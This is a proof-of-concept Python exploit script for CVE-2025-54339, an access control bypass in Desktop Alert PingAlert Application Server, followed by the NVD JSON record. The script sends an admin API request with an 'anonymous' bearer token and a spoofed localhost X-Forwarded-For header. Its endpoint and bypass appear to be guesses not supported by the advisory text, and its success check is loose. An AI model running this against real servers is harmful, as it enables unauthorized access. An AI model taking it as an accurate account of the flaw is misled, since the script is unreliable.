CVE-2025-54339

import socket import struct # CVE-2025-54339 PoC - Desktop Alert PingAlert Access Control Bypass # Target: Desktop Alert PingAlert Application Server # Vulnerability: Incorrect Access Control in Application Server def exploit_pingalert(target_ip, target_port=8080): """ Exploit for CVE-2025-54339 This PoC demonstrates the access control bypass vulnerability in Desktop Alert PingAlert Application Server. WARNING: Only use for authorized security testing """ # Craft malicious HTTP request to bypass access control # The server does not properly validate authentication tokens payload = b"GET /admin/api/system/config HTTP/1.1\r\n" payload += b"Host: " + target_ip.encode() + b":" + str(target_port).encode() + b"\r\n" payload += b"User-Agent: Mozilla/5.0\r\n" payload += b"Accept: */*\r\n" payload += b"Authorization: Bearer anonymous\r\n" # Bypass token payload += b"X-Forwarded-For: 127.0.0.1\r\n" # Spoof internal IP payload += b"Connection: close\r\n\r\n" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) sock.send(payload) response = sock.recv(4096) sock.close() print(f"[+] Request sent to {target_ip}:{target_port}") print(f"[+] Response received: {len(response)} bytes") # Check if access was granted without proper authentication if b"200 OK" in response or b"application/json" in response: print("[!] VULNERABLE: Access control bypass successful") print("[!] Server returned sensitive data without authentication") return True else: print("[-] Target may not be vulnerable or patched") return False except Exception as e: print(f"[-] Error: {str(e)}") return False if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python cve_2025_54339_poc.py <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 8080 exploit_pingalert(target, port)

{"cve": {"id": "CVE-2025-54339", "sourceIdentifier": "[email protected]", "published": "2025-11-14T18:15:48.050", "lastModified": "2025-11-19T21:30:20.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Incorrect Access Control vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 exploitable remotely for Escalation of Privileges."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.0.11", "versionEndExcluding": "6.1.1.4", "matchCriteriaId": "3CE54623-DECB-4213-B299-40AAE561D3E2"}]}]}], "references": [{"url": "https://desktopalert.net", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://desktopalert.net/cve-2025-54339/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}